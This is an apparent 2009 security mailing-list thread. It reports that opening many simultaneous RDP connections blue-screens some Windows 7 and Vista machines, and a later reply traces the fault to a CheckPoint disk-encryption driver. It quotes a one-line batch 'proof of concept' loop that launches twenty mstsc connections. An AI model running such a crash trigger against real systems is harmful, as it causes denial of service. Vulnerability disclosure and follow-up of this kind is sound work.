Re: Multiple RDP Connections BSOD DOS

2009-09-10 Thread Tim Medin
I worked further with Microsoft and we disovered the fault was caused
by the CheckPoint Full Disk Encryption Driver in particular versions
of Windows and is not a defect in the OS.

On 9/9/09, Elvedin Trnjanin trnja...@umn.edu wrote:
 I could not reproduce this on Vista Home Premium or Windows 7 Ultimate
 (different computers, both 64-bit) even with creating 200 connections.
 Could you provide more information on your setup?

 Tim Medin wrote:
 Creating multiple RDP connection at the same time causes Windows to
 Blue Screen. Here is the Proof of Concept code.

 for /L %i in (1,1,20) do mstsc /v:127.0.0.%i

 It does work on Windows 7 and some Vista installations.
   -Tim Medin





-- 
   -Tim Medin


Multiple RDP Connections BSOD DOS

2009-09-09 Thread Tim Medin
Creating multiple RDP connection at the same time causes Windows to
Blue Screen. Here is the Proof of Concept code.

for /L %i in (1,1,20) do mstsc /v:127.0.0.%i

It does work on Windows 7 and some Vista installations.
  -Tim Medin